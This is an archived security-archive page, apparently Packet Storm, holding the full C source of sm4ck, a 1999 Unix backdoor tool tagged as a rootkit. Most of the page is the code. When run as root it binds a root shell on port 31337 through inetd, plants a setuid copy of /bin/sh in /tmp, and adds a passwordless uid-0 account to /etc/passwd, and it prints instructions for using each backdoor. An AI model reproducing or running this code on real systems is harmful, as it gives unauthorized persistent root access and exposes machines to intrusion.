global security disclosure

sm4ck.c

sm4ck.c
Posted Aug 17, 1999
Authored by Sector9 of rewted.org

sm4ck v0.1 adds three simple backdoors to the box you execute it on.

tags | tool, rootkit
systems | unix
MD5 | 932b3e5d06df84fa9d92252e63798898

sm4ck.c

Change Mirror Download
/* sm4ck v0.1

Adds simple backdoors to the box you execute it on.
this is so simple it can be done manually.
and no i dont know c for shit!@$!@

Compile: gcc sm4ck.c -o sm4ck

Example: ./sm4ck <option> (i.e. ./sm4ck -a)

coded by Sector9 of rewted.org - 1999

http://www.rewted.org sector9@rewted.org

*/


#include <stdio.h>
#include <stdlib.h>

#define MAX_OPTIONS 5

char * options_string [MAX_OPTIONS] =
{"-p: binds a root shell on port 31337.",
"-s: creates suid sh in /tmp.",
"-u: creates hax0r uid0 account w/o passwd.",
"-i: information.",
"-x: contact.\n" };
char * options_arg [MAX_OPTIONS] = {"-p", "-s", "-u", "-i", "-x"};

void main(int argc, char * argv[])
{
int c, d;
if (argc==1) // no arguments, print out usage
{
printf("\n (sm4ck)\n");
printf("\n simple backdoor utility\n");
printf(" sector9@rewted.org - FEB 1999\n");
printf(" *must be run as r00t*\n");
printf("\n");

for (c=0; c<MAX_OPTIONS; c++)
printf("\t%s\n", options_string[c]);
return;
}
else
{
for (d=1; d<argc; d++)
{
FILE *fd;
if (!strcmp(argv[d], options_arg[0]))
{
printf("\n(sm4ck)\n");
printf("sector9@rewted.org\n");
printf("\nadd1ng backd00r... (-p)\n");
fd=fopen("/etc/services","a+");fprintf(fd,"backdoor 31337/tcp backdoor\n");
fd=fopen("/etc/inetd.conf","a+");fprintf(fd,"backdoor stream tcp nowait root /usr/sbin/tcpd /bin/sh -i\n");
execl("killall", "-HUP", "inetd");
printf("\ndone.\n");
printf("telnet to port 31337\n\n");
}
else if (!strcmp(argv[d], options_arg[1]))
{
printf("\n(sm4ck)\n");
printf("sector9@rewted.org\n");
printf("\nadd1ng backd00r... (-s)\n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4711 /tmp/.sh");
printf("\ndone.\n");
printf("execute /tmp/.sh\n\n");

}
else if (!strcmp(argv[d], options_arg[2]))
{
printf("\n(sm4ck)\n");
printf("sector9@rewted.org\n");
printf("\nadd1ng backd00r... (-u)\n");
fd=fopen("/etc/passwd","a+");fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
printf("\ndone.\n");
printf("uid 0 and gid 0 account added\n\n");

}
else if (!strcmp(argv[d], options_arg[3]))
{
printf("\n(sm4ck)\n");
printf("sector9@rewted.org\n");
printf("\n1nf0... (-i)");
printf("\n
p - Adds entries to /etc/services
& /etc/inetd.conf giving you
a root shell on port 31337.
example: telnet <host> 31337

s - Creates a copy of /bin/sh to
/tmp/.sh which, whenever
executed gives you a root
shell.
example: /tmp/.sh

u - Adds an account with uid and
gid 0 to the passwd file.
The login is 'hax0r' and
there is no passwd.

");
}
else if (!strcmp(argv[d], options_arg[4]))
{
printf("\nhttp://www.rewted.org\n");
printf("\nsector9@rewted.org\n\n");
}

}
}
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close